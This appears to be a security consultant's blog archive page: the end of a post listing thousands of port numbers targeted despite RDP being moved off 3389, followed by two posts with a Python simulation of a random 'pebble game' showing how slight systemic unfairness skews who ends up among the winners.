913   2192  4044  6389	8404  11373 23282 33053 44017 45808 47485 62019
914   2193  4045  6390	8405  11376 23283 33060 44025 45809 47533 62025
915   2194  4050  6394	8406  11401 23284 33068 44027 45810 47557 62063
916   2195  4054  6395	8407  11410 23321 33069 44030 45811 47568 62064
917   2196  4055  6396	8409  11414 23322 33075 44043 45812 47581 62071
918   2197  4058  6398	8410  11433 23323 33078 44053 45813 47586 62086
919   2198  4060  6399	8411  11453 23324 33079 44078 45814 47605 62105
920   2199  4061  6400	8412  11467 23325 33082 44098 45815 47629 62111
921   2200  4062  6401	8413  11486 23326 33083 44100 45817 47661 62116
922   2201  4063  6402	8414  11505 23327 33084 44103 45818 47688 62124
923   2202  4064  6403	8415  11512 23328 33085 44104 45819 47721 62188
924   2203  4065  6405	8416  11529 23329 33086 44105 45820 47725 62193
925   2204  4066  6406	8417  11533 23331 33088 44111 45821 47751 62216
926   2205  4067  6407	8418  11537 23335 33089 44113 45823 47761 62217
927   2206  4068  6408	8419  11541 23344 33091 44117 45824 47777 62220
928   2207  4069  6409	8420  11550 23345 33096 44120 45825 47779 62232
929   2208  4070  6410	8421  11555 23346 33099 44121 45826 47808 62233
930   2209  4071  6411	8423  11567 23347 33102 44139 45827 47821 62260
931   2210  4072  6414	8425  11581 23348 33107 44144 45828 47827 62284
932   2211  4073  6418	8426  11606 23349 33111 44161 45829 47869 62289
933   2212  4074  6419	8427  11615 23350 33113 44165 45830 47878 62291
934   2213  4075  6420	8428  11631 23351 33121 44174 45831 47892 62295
935   2214  4076  6429	8429  11654 23354 33133 44184 45833 47895 62307
936   2215  4077  6433	8430  11659 23355 33139 44185 45834 47917 62320
937   2216  4078  6436	8431  11683 23356 33141 44199 45835 47921 62352
938   2217  4079  6437	8432  11707 23358 33148 44200 45837 47923 62363
939   2218  4080  6438	8433  11727 23362 33149 44205 45838 47941 62377
940   2219  4081  6441	8434  11784 23364 33152 44212 45839 47963 62428
941   2220  4082  6443	8435  11802 23369 33153 44222 45840 47970 62430
942   2221  4083  6445	8436  11803 23378 33156 44238 45841 47999 62441
943   2222  4084  6446	8437  11810 23379 33160 44253 45842 48000 62469
944   2223  4085  6447	8438  11825 23380 33162 44257 45843 48001 62478
945   2224  4086  6448	8439  11832 23388 33165 44263 45844 48005 62480
946   2225  4087  6450	8440  11842 23389 33172 44268 45845 48013 62502
947   2226  4088  6451	8441  11851 23390 33176 44281 45846 48019 62510
948   2227  4089  6452	8442  11855 23392 33184 44289 45847 48067 62547
949   2228  4090  6453	8443  11899 23394 33186 44301 45848 48086 62548
950   2229  4091  6454	8444  11926 23396 33189 44323 45849 48105 62552
951   2230  4092  6455	8445  11947 23398 33197 44345 45850 48134 62559
952   2231  4093  6456	8446  11995 23399 33198 44346 45852 48135 62564
953   2232  4094  6457	8447  12001 23400 33200 44353 45853 48146 62586
954   2233  4095  6458	8448  12005 23401 33202 44377 45854 48157 62594
955   2234  4096  6459	8449  12009 23402 33205 44385 45855 48162 62608
956   2235  4097  6460	8450  12012 23403 33214 44389 45856 48178 62629
957   2236  4098  6462	8451  12019 23404 33219 44390 45857 48194 62652
958   2237  4099  6464	8452  12022 23411 33221 44396 45858 48201 62658
959   2238  4100  6465	8453  12024 23412 33222 44397 45859 48205 62666
960   2239  4101  6467	8454  12032 23413 33226 44398 45860 48210 62684
961   2240  4102  6472	8455  12038 23420 33228 44400 45861 48211 62712
962   2241  4103  6473	8456  12039 23421 33230 44401 45862 48230 62715
963   2242  4104  6474	8457  12051 23422 33232 44420 45863 48251 62717
964   2243  4105  6475	8458  12053 23426 33234 44421 45864 48259 62734
965   2244  4106  6476	8459  12055 23427 33245 44430 45865 48274 62745
966   2245  4107  6477	8460  12061 23428 33252 44433 45867 48275 62751
967   2246  4108  6478	8461  12064 23432 33256 44441 45868 48289 62753
968   2247  4109  6479	8462  12090 23444 33270 44444 45869 48307 62757
969   2248  4110  6480	8463  12099 23453 33286 44445 45871 48322 62801
970   2249  4111  6482	8464  12102 23454 33289 44446 45872 48345 62818
971   2250  4112  6484	8465  12103 23455 33296 44447 45875 48350 62820
972   2251  4113  6485	8466  12105 23456 33300 44449 45877 48354 62821
973   2252  4114  6489	8467  12120 23483 33304 44457 45878 48355 62854
974   2253  4115  6493	8468  12121 23484 33305 44472 45879 48358 62870
975   2254  4116  6494	8469  12128 23485 33306 44473 45880 48360 62874
976   2255  4117  6495	8470  12139 23486 33317 44478 45881 48367 62905
977   2256  4118  6496	8471  12153 23487 33318 44481 45882 48370 62908
978   2257  4119  6499	8472  12173 23488 33319 44491 45883 48389 62911
979   2258  4120  6500	8473  12175 23492 33320 44497 45884 48390 62929
980   2259  4121  6501	8474  12179 23493 33321 44500 45886 48393 62965
981   2260  4122  6502	8475  12184 23494 33322 44504 45887 48398 62977
982   2261  4123  6503	8476  12187 23498 33328 44520 45889 48403 63002
983   2262  4124  6504	8477  12188 23501 33330 44523 45890 48418 63005
984   2263  4125  6505	8478  12200 23502 33333 44534 45891 48451 63006
985   2264  4126  6510	8479  12201 23503 33334 44555 45892 48452 63010
986   2265  4127  6511	8480  12210 23513 33336 44556 45894 48455 63016
987   2266  4128  6515	8481  12215 23514 33337 44598 45895 48466 63019
988   2267  4129  6518	8482  12221 23515 33338 44601 45896 48470 63027
989   2268  4130  6523	8483  12222 23531 33340 44602 45897 48476 63029
990   2269  4131  6524	8484  12232 23532 33363 44603 45898 48497 63048
991   2270  4132  6525	8485  12236 23533 33365 44604 45899 48499 63049
992   2271  4133  6530	8486  12251 23535 33366 44605 45900 48504 63073
993   2272  4134  6532	8487  12254 23540 33376 44606 45901 48514 63076
994   2273  4135  6534	8488  12279 23544 33377 44607 45902 48525 63096
995   2274  4136  6535	8489  12314 23556 33380 44608 45903 48546 63121
996   2275  4137  6536	8490  12321 23558 33381 44609 45904 48547 63127
997   2276  4138  6537	8491  12324 23559 33382 44610 45905 48555 63133
998   2277  4139  6538	8492  12337 23560 33386 44611 45906 48586 63150
999   2278  4140  6541	8493  12342 23561 33388 44612 45907 48595 63154
1000  2279  4141  6542	8494  12345 23562 33389 44613 45908 48623 63182
1001  2280  4142  6543	8495  12346 23563 33390 44615 45909 48625 63191
1003  2281  4143  6544	8496  12354 23567 33391 44616 45910 48626 63193
1004  2282  4144  6545	8497  12361 23568 33392 44617 45911 48645 63260
1005  2283  4145  6546	8498  12366 23569 33393 44618 45912 48648 63261
1007  2284  4146  6547	8499  12372 23585 33394 44619 45913 48686 63279
1008  2285  4147  6548	8500  12374 23586 33395 44620 45914 48691 63285
1010  2286  4148  6549	8501  12389 23587 33396 44621 45915 48696 63287
1011  2287  4149  6552	8502  12392 23588 33397 44622 45916 48706 63288
1016  2288  4150  6553	8503  12399 23589 33398 44623 45918 48739 63289
1018  2289  4151  6555	8504  12417 23590 33399 44624 45919 48769 63300
1020  2290  4152  6556	8505  12450 23592 33400 44625 45920 48802 63303
1022  2291  4153  6557	8506  12466 23606 33406 44627 45921 48834 63307
1023  2292  4154  6558	8507  12476 23607 33407 44628 45922 48835 63308
1029  2293  4155  6559	8508  12487 23608 33408 44629 45924 48883 63309
1030  2294  4156  6560	8509  12495 23611 33412 44630 45925 48885 63332
1033  2295  4157  6561	8510  12497 23618 33415 44631 45926 48933 63338
1035  2296  4158  6562	8511  12507 23620 33416 44632 45927 48946 63352
1036  2297  4159  6563	8512  12508 23626 33424 44633 45928 48989 63357
1039  2298  4160  6564	8513  12509 23637 33427 44634 45929 48994 63363
1040  2299  4161  6565	8514  12512 23645 33429 44635 45930 49000 63385
1043  2300  4162  6566	8515  12530 23646 33430 44636 45931 49005 63388
1045  2301  4163  6567	8516  12533 23647 33431 44637 45932 49042 63389
1046  2302  4164  6568	8517  12534 23651 33433 44638 45933 49104 63390
1050  2303  4165  6575	8518  12543 23652 33434 44639 45934 49105 63391
1058  2304  4166  6577	8519  12558 23653 33444 44640 45935 49114 63392
1061  2305  4167  6578	8520  12580 23657 33445 44641 45936 49132 63414
1062  2306  4168  6580	8521  12594 23658 33450 44642 45937 49149 63420
1063  2307  4169  6581	8522  12598 23659 33473 44643 45938 49152 63421
1064  2308  4170  6582	8523  12600 23663 33482 44644 45939 49153 63423
1065  2309  4171  6585	8524  12616 23664 33489 44645 45940 49158 63426
1066  2310  4172  6586	8525  12620 23665 33490 44646 45941 49201 63433
1067  2311  4173  6587	8526  12626 23672 33501 44647 45942 49209 63445
1068  2312  4174  6588	8527  12628 23675 33503 44648 45944 49274 63453
1069  2313  4175  6589	8528  12639 23678 33505 44649 45945 49300 63458
1070  2314  4176  6591	8529  12642 23679 33510 44651 45946 49349 63469
1071  2315  4177  6598	8530  12655 23680 33511 44652 45947 49383 63529
1072  2316  4178  6599	8531  12668 23682 33515 44653 45948 49389 63541
1073  2317  4179  6600	8532  12681 23714 33521 44654 45949 49399 63565
1074  2318  4180  6601	8533  12687 23717 33533 44655 45950 49430 63567
1075  2319  4181  6602	8534  12701 23718 33549 44656 45951 49443 63569
1076  2320  4182  6603	8535  12704 23719 33552 44657 45952 49549 63570
1077  2321  4183  6604	8536  12716 23720 33555 44658 45953 49555 63587
1078  2322  4184  6605	8537  12721 23721 33568 44659 45954 49585 63590
1079  2323  4185  6606	8538  12735 23722 33578 44660 45955 49634 63597
1080  2324  4186  6607	8539  12738 23724 33587 44661 45956 49645 63605
1081  2325  4187  6608	8540  12764 23726 33590 44662 45957 49658 63624
1082  2326  4188  6609	8541  12783 23727 33600 44663 45958 49682 63625
1083  2327  4189  6610	8542  12786 23728 33611 44664 45959 49700 63628
1084  2328  4190  6611	8543  12792 23741 33612 44665 45961 49705 63656
1085  2329  4191  6612	8544  12800 23742 33614 44666 45962 49708 63673
1086  2330  4192  6613	8545  12805 23743 33616 44667 45963 49730 63678
1087  2331  4193  6616	8546  12811 23747 33619 44668 45964 49748 63702
1088  2332  4194  6617	8547  12812 23748 33632 44669 45965 49760 63708
1089  2333  4195  6619	8548  12820 23749 33643 44671 45966 49772 63744
1090  2334  4196  6620	8549  12829 23753 33654 44672 45967 49773 63754
1091  2335  4197  6621	8550  12834 23756 33660 44673 45968 49776 63769
1092  2336  4198  6622	8551  12860 23757 33661 44674 45969 49777 63773
1093  2337  4199  6623	8552  12888 23758 33666 44675 45970 49779 63789
1094  2338  4200  6624	8553  12896 23761 33681 44676 45971 49789 63798
1095  2339  4202  6625	8554  12898 23766 33686 44678 45972 49796 63799
1096  2340  4206  6626	8555  12908 23774 33740 44679 45973 49839 63802
1097  2341  4207  6627	8556  12920 23780 33750 44680 45974 49857 63813
1098  2342  4210  6628	8557  12927 23786 33752 44681 45975 49866 63817
1099  2343  4215  6631	8558  12930 23787 33765 44682 45976 49870 63832
1100  2344  4220  6632	8559  12940 23789 33777 44683 45977 49871 63836
1101  2345  4228  6633	8560  12975 23791 33778 44684 45978 49874 63839
1102  2346  4232  6634	8561  12977 23792 33780 44686 45980 49878 63852
1103  2347  4233  6637	8562  12984 23793 33786 44687 45981 49910 63867
1104  2348  4239  6638	8563  12986 23794 33789 44688 45982 49914 63868
1105  2349  4242  6639	8564  12996 23795 33790 44689 45983 49915 63873
1106  2350  4243  6640	8565  12998 23796 33791 44690 45984 49919 63884
1107  2351  4244  6644	8566  13000 23797 33798 44692 45985 49922 63900
1108  2352  4248  6645	8567  13003 23803 33800 44693 45986 49933 63922
1109  2353  4249  6646	8568  13005 23804 33801 44694 45987 49934 63929
1110  2354  4250  6647	8569  13009 23805 33803 44695 45988 49935 63931
1111  2355  4252  6648	8570  13018 23806 33804 44696 45989 49965 63932
1112  2356  4256  6650	8571  13022 23815 33805 44697 45992 49988 63964
1113  2357  4258  6651	8572  13023 23816 33806 44698 45993 49991 63976
1114  2358  4261  6652	8573  13026 23817 33808 44699 45994 49996 63994
1115  2359  4262  6653	8574  13027 23818 33809 44700 45995 50000 64001
1116  2360  4263  6654	8575  13040 23822 33810 44701 45997 50001 64003
1117  2361  4265  6655	8576  13043 23823 33811 44703 45998 50002 64004
1118  2362  4268  6656	8577  13052 23824 33812 44704 45999 50003 64005
1119  2363  4275  6658	8578  13055 23829 33813 44706 46000 50004 64013
1120  2364  4276  6660	8579  13064 23831 33814 44707 46001 50005 64014
1121  2365  4277  6661	8580  13071 23832 33815 44708 46002 50006 64031
1122  2366  4280  6662	8581  13074 23833 33817 44711 46003 50009 64032
1123  2367  4282  6663	8582  13084 23856 33818 44712 46004 50011 64037
1125  2368  4286  6664	8583  13089 23864 33819 44714 46005 50015 64046
1126  2369  4287  6665	8584  13113 23865 33820 44715 46006 50017 64049
1128  2370  4289  6666	8585  13122 23866 33821 44716 46007 50018 64060
1130  2371  4291  6668	8586  13134 23870 33822 44717 46009 50020 64061
1132  2372  4294  6669	8587  13157 23871 33823 44718 46011 50029 64062
1134  2373  4300  6670	8588  13162 23872 33824 44719 46013 50030 64072
1136  2374  4301  6671	8589  13167 23885 33825 44720 46014 50031 64076
1137  2375  4302  6672	8590  13185 23886 33827 44721 46015 50035 64078
1138  2376  4303  6673	8591  13196 23887 33828 44722 46016 50037 64084
1140  2377  4304  6674	8592  13198 23889 33829 44724 46017 50038 64108
1142  2378  4305  6676	8593  13208 23891 33830 44726 46018 50043 64109
1143  2379  4306  6677	8594  13215 23892 33831 44727 46019 50044 64119
1144  2380  4310  6678	8595  13226 23893 33833 44728 46020 50045 64130
1145  2381  4311  6679	8596  13245 23897 33834 44729 46021 50046 64156
1147  2382  4316  6680	8597  13258 23898 33835 44730 46022 50055 64158
1148  2383  4317  6681	8598  13265 23899 33836 44731 46023 50060 64181
1149  2384  4319  6682	8599  13272 23902 33837 44732 46024 50069 64185
1150  2385  4320  6683	8600  13309 23909 33838 44733 46025 50070 64191
1151  2386  4321  6684	8602  13313 23910 33839 44734 46026 50071 64193
1153  2387  4322  6685	8603  13315 23911 33840 44735 46027 50073 64199
1154  2388  4330  6686	8604  13317 23918 33841 44736 46028 50075 64202
1155  2389  4333  6687	8614  13322 23925 33842 44737 46029 50081 64215
1156  2390  4341  6688	8620  13332 23939 33843 44738 46030 50084 64232
1157  2391  4342  6689	8621  13334 23940 33845 44739 46031 50090 64235
1158  2392  4345  6690	8622  13336 23941 33846 44740 46032 50091 64250
1159  2393  4346  6691	8624  13352 23948 33847 44741 46035 50092 64252
1160  2394  4347  6692	8628  13355 23949 33848 44742 46036 50097 64258
1161  2395  4348  6693	8629  13361 23950 33849 44744 46037 50102 64267
1162  2396  4349  6694	8630  13368 23957 33850 44747 46038 50109 64268
1163  2397  4350  6695	8631  13377 23958 33851 44748 46039 50111 64274
1164  2398  4351  6696	8633  13380 23959 33852 44749 46040 50115 64282
1165  2399  4352  6697	8637  13382 23971 33853 44750 46041 50116 64287
1166  2400  4353  6698	8642  13385 23975 33854 44751 46042 50122 64291
1167  2401  4354  6699	8644  13387 23976 33855 44752 46043 50123 64316
1168  2402  4355  6700	8645  13389 23977 33856 44753 46044 50132 64330
1170  2403  4365  6701	8646  13390 23978 33857 44754 46045 50139 64333
1171  2404  4366  6702	8648  13391 23979 33858 44755 46046 50150 64336
1172  2405  4367  6703	8652  13392 23980 33859 44756 46047 50153 64364
1173  2406  4369  6704	8653  13394 23984 33860 44757 46048 50155 64365
1174  2407  4372  6705	8657  13395 23985 33861 44758 46049 50156 64389
1175  2408  4373  6706	8659  13396 23986 33862 44759 46050 50161 64392
1177  2409  4376  6707	8660  13397 23988 33863 44760 46051 50170 64397
1179  2410  4377  6708	8661  13399 24000 33864 44761 46052 50172 64399
1180  2411  4378  6709	8663  13402 24002 33865 44762 46053 50178 64411
1181  2412  4380  6710	8668  13403 24007 33866 44763 46054 50182 64412
1182  2413  4381  6711	8669  13404 24014 33867 44764 46055 50191 64422
1183  2414  4382  6715	8670  13406 24015 33868 44766 46056 50200 64444
1184  2415  4383  6716	8671  13408 24016 33869 44767 46057 50202 64448
1185  2416  4384  6720	8672  13411 24017 33870 44768 46058 50211 64460
1186  2417  4388  6724	8673  13415 24020 33871 44769 46059 50218 64465
1187  2418  4389  6726	8674  13416 24025 33872 44770 46060 50221 64467
1188  2419  4390  6734	8677  13423 24026 33873 44771 46061 50222 64489
1189  2420  4391  6737	8678  13424 24027 33874 44772 46062 50223 64491
1190  2421  4392  6738	8679  13434 24028 33875 44773 46063 50226 64506
1191  2422  4393  6739	8681  13466 24029 33876 44774 46064 50241 64508
1192  2423  4394  6745	8683  13490 24032 33877 44776 46066 50246 64512
1193  2424  4395  6746	8691  13498 24033 33878 44777 46067 50250 64520
1194  2425  4396  6747	8692  13499 24034 33879 44778 46068 50251 64522
1195  2426  4397  6751	8693  13509 24045 33880 44779 46069 50254 64528
1196  2427  4398  6752	8694  13512 24046 33881 44781 46070 50256 64532
1197  2429  4399  6753	8697  13515 24050 33882 44782 46071 50267 64541
1198  2430  4400  6754	8699  13521 24051 33884 44783 46072 50269 64545
1199  2431  4401  6758	8700  13579 24052 33885 44784 46073 50273 64552
1200  2432  4402  6760	8701  13582 24053 33886 44785 46074 50275 64556
1203  2433  4403  6761	8706  13583 24054 33887 44786 46075 50278 64559
1204  2434  4404  6762	8707  13657 24055 33888 44787 46077 50300 64566
1205  2435  4405  6763	8716  13668 24056 33889 44788 46078 50315 64580
1207  2436  4410  6767	8717  13675 24057 33890 44789 46079 50320 64596
1208  2437  4411  6771	8718  13690 24058 33891 44790 46080 50341 64604
1212  2438  4412  6772	8727  13691 24069 33892 44791 46081 50360 64609
1218  2439  4413  6773	8728  13716 24079 33893 44792 46082 50382 64629
1221  2440  4414  6774	8729  13722 24085 33894 44793 46083 50383 64639
1226  2441  4415  6776	8730  13723 24092 33895 44794 46084 50389 64652
1234  2442  4418  6778	8733  13727 24093 33896 44795 46085 50390 64666
1236  2443  4419  6779	8734  13729 24094 33897 44796 46086 50400 64669
1237  2444  4420  6780	8735  13738 24101 33898 44797 46087 50402 64687
1262  2445  4421  6781	8736  13748 24102 33899 44798 46088 50410 64720
1265  2446  4422  6782	8739  13754 24103 33900 44799 46089 50435 64742
1271  2447  4423  6783	8740  13801 24113 33901 44800 46090 50443 64801
1272  2448  4424  6784	8741  13804 24114 33903 44801 46091 50444 64821
1273  2449  4425  6785	8743  13821 24115 33904 44803 46092 50450 64825
1274  2450  4426  6786	8746  13850 24120 33905 44804 46093 50479 64846
1275  2451  4427  6788	8749  13860 24122 33906 44805 46094 50502 64860
1276  2452  4428  6789	8750  13892 24123 33908 44806 46095 50505 64864
1277  2453  4429  6790	8751  13896 24124 33909 44808 46096 50507 64868
1278  2454  4430  6791	8752  13899 24128 33910 44809 46097 50515 64875
1279  2455  4431  6792	8753  13905 24129 33911 44810 46098 50521 64888
1280  2456  4432  6797	8754  13915 24130 33912 44811 46099 50533 64899
1281  2457  4433  6798	8756  13942 24138 33913 44812 46100 50543 64929
1282  2458  4434  6799	8757  13950 24139 33914 44813 46101 50556 64931
1283  2459  4435  6800	8763  13988 24140 33915 44814 46102 50561 64938
1284  2460  4436  6803	8765  13992 24143 33916 44815 46103 50563 64943
1285  2461  4437  6805	8766  13999 24144 33917 44816 46104 50573 64979
1286  2462  4439  6807	8767  14001 24145 33918 44817 46105 50575 64981
1287  2463  4440  6808	8770  14004 24150 33919 44818 46106 50621 64982
1288  2464  4441  6809	8772  14005 24159 33920 44819 46107 50633 64985
1289  2465  4442  6810	8776  14014 24167 33921 44821 46108 50639 64986
1290  2466  4443  6811	8777  14038 24168 33922 44822 46110 50647 64990
1291  2467  4444  6813	8778  14047 24169 33923 44823 46111 50649 65000
1292  2468  4445  6819	8779  14051 24173 33924 44824 46112 50660 65001
1293  2469  4446  6820	8784  14052 24174 33925 44825 46113 50667 65008
1294  2470  4447  6821	8785  14079 24175 33926 44826 46114 50706 65022
1295  2478  4448  6822	8787  14080 24181 33927 44827 46115 50716 65027
1296  2483  4449  6826	8789  14084 24183 33928 44828 46116 50726 65029
1297  2489  4450  6827	8791  14085 24189 33929 44829 46117 50733 65042
1298  2494  4451  6828	8792  14086 24191 33930 44831 46119 50741 65050
1299  2498  4452  6830	8793  14092 24192 33933 44832 46120 50755 65053
1300  2500  4453  6831	8794  14105 24193 33934 44833 46121 50766 65094
1301  2501  4454  6832	8795  14108 24199 33935 44834 46122 50769 65101
1302  2502  4455  6833	8798  14112 24203 33936 44835 46123 50771 65108
1303  2503  4456  6834	8799  14140 24204 33937 44836 46124 50789 65110
1304  2504  4457  6837	8800  14143 24205 33938 44837 46126 50792 65115
1305  2505  4458  6840	8801  14171 24206 33939 44838 46127 50814 65121
1306  2506  4469  6853	8802  14178 24208 33940 44839 46128 50832 65133
1307  2507  4470  6854	8803  14182 24212 33941 44840 46131 50861 65143
1308  2508  4471  6855	8804  14186 24213 33942 44842 46132 50877 65153
1309  2509  4474  6856	8805  14187 24214 33943 44843 46133 50892 65166
1310  2511  4476  6857	8807  14200 24218 33944 44844 46134 50897 65173
1311  2512  4478  6858	8808  14201 24219 33946 44845 46135 50900 65180
1312  2513  4480  6859	8809  14211 24220 33947 44846 46136 50902 65188
1313  2514  4481  6860	8811  14220 24225 33948 44848 46137 50908 65200
1314  2515  4482  6862	8812  14230 24229 33949 44850 46138 50915 65209
1315  2516  4483  6863	8813  14242 24242 33950 44851 46139 50923 65219
1316  2517  4484  6864	8814  14246 24243 33951 44852 46140 50929 65222
1317  2518  4485  6865	8816  14278 24244 33952 44853 46141 50940 65234
1318  2519  4486  6867	8817  14293 24254 33953 44854 46143 50946 65238
1319  2520  4487  6868	8820  14295 24255 33954 44855 46144 50957 65256
1320  2521  4488  6869	8822  14311 24256 33955 44856 46145 51000 65259
1321  2522  4489  6870	8824  14332 24269 33956 44857 46146 51001 65269
1323  2523  4490  6876	8825  14342 24270 33957 44858 46147 51003 65270
1324  2524  4491  6878	8826  14346 24271 33958 44859 46148 51005 65271
1325  2525  4492  6880	8827  14354 24276 33959 44860 46150 51008 65272
1326  2526  4493  6882	8828  14386 24279 33960 44863 46151 51015 65289
1327  2527  4494  6884	8829  14389 24284 33961 44864 46152 51018 65292
1328  2528  4495  6889	8831  14390 24285 33962 44865 46153 51020 65325
1329  2529  4496  6890	8833  14393 24286 33963 44866 46154 51023 65333
1330  2530  4497  6894	8835  14401 24287 33965 44867 46156 51029 65338
1331  2531  4498  6895	8838  14402 24288 33966 44868 46157 51043 65341
1333  2532  4499  6896	8839  14403 24289 33967 44869 46158 51055 65350
1334  2533  4501  6897	8840  14404 24296 33969 44870 46159 51073 65363
1335  2534  4502  6898	8841  14405 24297 33970 44871 46160 51077 65365
1336  2535  4505  6899	8845  14406 24298 33971 44872 46161 51088 65378
1337  2536  4521  6900	8846  14407 24307 33972 44873 46162 51093 65389
1338  2537  4522  6901	8847  14408 24315 33973 44874 46163 51101 65400
1339  2538  4523  6902	8849  14409 24323 33974 44875 46164 51104 65404
1340  2539  4524  6903	8850  14410 24324 33975 44876 46165 51109 65408
1341  2540  4525  6904	8853  14411 24325 33979 44877 46166 51112 65413
1342  2541  4528  6905	8855  14412 24335 33980 44878 46167 51114 65419
1344  2542  4529  6906	8856  14413 24336 33981 44879 46168 51115 65431
1345  2543  4532  6907	8858  14414 24337 33983 44880 46170 51116 65461
1346  2544  4535  6909	8859  14415 24345 33984 44881 46171 51117 65466
1347  2545  4541  6910	8861  14416 24351 33985 44882 46172 51120 65482
1348  2546  4542  6913	8863  14417 24353 33986 44883 46174 51121 65483
1349  2547  4545  6914	8864  14418 24354 33987 44884 46175 51126 65500
1350  2548  4546  6915	8865  14419 24355 33988 44886 46176 51127 65502
1351  2549  4550  6916	8866  14420 24356 33989 44887 46177 51142 65505
1352  2551  4554  6925	8867  14421 24357 33990 44888 46178 51143 65510
1353  2552  4555  6929	8869  14422 24358 33991 44889 46179 51158 65511
1354  2553  4556  6931	8870  14428 24359 33992 44890 46180 51167 65512
1355  2554  4561  6932	8872  14434 24360 33993 44891 46181 51169 65515
1356  2555  4567  6933	8873  14437 24361 33994 44892 46182 51172 65516
1357  2556  4568  6934	8874  14443 24363 33995 44893 46184 51176 65517
1359  2557  4570  6935	8875  14444 24365 33996 44894 46185 51178 65518
1360  2558  4581  6936	8876  14456 24371 33997 44895 46186 51189 65519
1361  2559  4585  6937	8877  14463 24373 33998 44896 46187 51198 65520
1362  2560  4587  6942	8878  14470 24374 33999 44897 46188 51204 65523
1363  2561  4589  6943	8879  14479 24375 34000 44898 46189 51209 65527
1364  2562  4594  6944	8880  14481 24376 34005 44899 46190 51213 65528
1365  2563  4596  6946	8881  14486 24389 34035 44900 46191 51232 65529
1366  2564  4598  6947	8882  14490 24393 34103 44901 46192 51247 65530
1367  2565  4601  6948	8883  14498 24404 34130 44902 46193 51248 65531
1368  2566  4604  6954	8884  14506 24405 34134 44903 46194 51249 65532
1369  2567  4610  6955	8885  14507 24406 34148 44904 46195 51251 65533
1370  2568  4611  6957	8886  14511 24410 34167 44905 46196 51253 65534
1371  2569  4616  6959	8887  14539 24411 34169 44906 46198 51260 65535
1372  2570  4617  6960	8888  14547

Just in case you’re wondering, that’s port 3389/tcp + 14,033 others…

Security through obscurity can sometimes get you out of the way of automated attack scripts. Not this time…

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
May 21, 2021

Then there’s the way I usually choose.

Yep. Trust me to do it the unreasonable and stoopid way.

The question I was asking in my previous blog post on this topic was pretty simple: Will even a small amount of systemic unfairness have a measurable and significant impact on who wins and who loses in our little, random game?

Here’s me, being stoopid: I decided to calculate the average ID Number of the winning cohort, to see how that was affected by injecting some unfairness into the game (i.e. 1% of the population refusing to give a pebble to a chunk of folks representing 10% of the overall population).

My method worked, but it finally dawned on me that I was taking a really round about way to look for my answer. I had the data - why not just look at the raw number of individuals in the affected population that actually made it into the winning cohort.

Doh.

Here’s the code to do just that. If it’s gibberish to you, feel free to ignore it… I’ll ‘splain below:

#!/usr/bin/env python3
import random
from datetime import datetime

# choose a random seed
random.seed(datetime.now().timestamp())

people = {}
averages = []
winners = []

# we begin with 1000 people, each with 100 pebbles
for i in range(1000):
    people[i] = 100

# let's play the game 100 times...
for k in range(100):
    # every second, each individual picks a random person and gives them one pebble
    for i in range(3600 * 8):
        for p in range(len(people)):
            r = p
            while(r == p):
                if p >= len(people) - (len(people) * 0.001):
                    r = random.randint(100,len(people) - 1)
                else:
                    r = random.randint(0,len(people) - 1)               
            if people[p] > 0:
                people[p] -= 1
                people[r] += 1
    # let's pull out the values so we can easily sort them...
    values = []
    for p in range(len(people)):
        values.append(people[p])
    # sort the results, lowest to highest
    values.sort()

    count = 0
    total = 0
    for p in range(100):
        if people[p] >= 100:
            count += 1
    for p in range(len(people)):
        if people[p] >= 100:
            total += 1
    print('Run #%3.3i count: %i winners: %i' % ((k + 1), count, total))
    averages.append(count)
    winners.append(total)
# now, let's do a little statistical math...
avg = sum(averages) / len(averages)
var = sum((x-avg)**2 for x in averages) / len(averages)
std = var**0.5
print('Overall (affected group): average:%f variance: %f std_deviation: %f' % (avg, var, std))
avg = sum(winners) / len(winners)
var = sum((x-avg)**2 for x in winners) / len(winners)
std = var**0.5
print('Overall (winners): average:%f variance: %f std_deviation: %f' % (avg, var, std))

So, once again, I’m playing the game 100 times. At the end of each game, I’m counting the number of folks in the affected group (the 10% of players with an ID Number in the range 0-99) that are winners (defined as having 100 or more pebbles at the end of the game). I’m also counting the overall number of winners.

In the original, completely fair version of the game, one would expect that our affected group - which makes up 10% of the overall population - would, on average, make up 10% of the winners. And yep, that’s what we find:

Overall (affected group): average:36.770000 variance: 24.357100 std_deviation: 4.935291
Overall (winners): average:367.810000 variance: 83.853900 std_deviation: 9.157178

But what happens with our 1% systemic unfairness paradigm?

Overall (affected group): average:4.470000 variance: 4.169100 std_deviation: 2.041837
Overall (winners): average:358.460000 variance: 97.348400 std_deviation: 9.866529

The affected group goes from making up 10.00% of the winners to only making up 1.25%, because only 1% of the overall population refuses to allow them a fair chance in the game.

By now, you really should know what comes next…

Let’s go a little further. What if only 0.1% of the players (only one person in our population of 1000 players) decides that they won’t give a pebble to a specific group comprising 10% of the population? Surely, systemic unfairness on such a small scale can’t have a measurable impact…

Overall (affected group): average:30.290000 variance: 23.885900 std_deviation: 4.887320
Overall (winners): average:369.440000 variance: 89.066400 std_deviation: 9.437500

With only 0.1% of the population behaving unfairly, the marginalized group now makes up, on average, only 8.20% of the winning population (when, in a completely fair game, they made up 10.00%).

Apparently, even the smallest amount of built-in unfairness can have a profound impact.

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
April 28, 2021

I decided that I wanted to look a little deeper.

If you didn’t read that post, please take a look now.

Just as a reminder, here is the setup and rules for the game:

Setup:

• We’re going to start off the game by gathering 1000 people together.
• We’re going to give each person 100 small pebbles in a cool, stylish drawstring bag. Perhaps it will be monogrammed. Who knows…
• We’re going to set up a timer that will, annoyingly, beep once every second.
• The game will last for 8 hours.

Rules:

1. With every annoying beep of the timer, each person is to - completely randomly - choose another person, and give them a pebble.

That’s it. Nothing more. It’s about as simple as you can make a game…

Remember: Each person randomly chooses someone else (not themselves) to give a pebble. On every turn, every person in the game gives away one pebble, but - because the choices are truly random, every person has the exact same chance (as every other person) of being the recipient of one or more of the 999 other pebbles that are given away.

I asked readers a question: at the end of eight hours, what will the distribution of pebbles look like?

I’m pretty sure that very few people would have predicted that it would look like this:

Despite the fact that all of the choices in the game are completely fair and random, the outcome of the game seems to be anything but fair:

• Some people end up with a crap-tonne of pebbles
• Some people end up with no pebbles at all
• This distribution is the result of the game every time.
• Every. Damned. Time.

This result was pretty counter-intuitive for me, and I said so. I also pointed out that the graph produced from the results of the game looked remarkably similar to a graph showing the distribution of U.S. Household Income by Percentile.

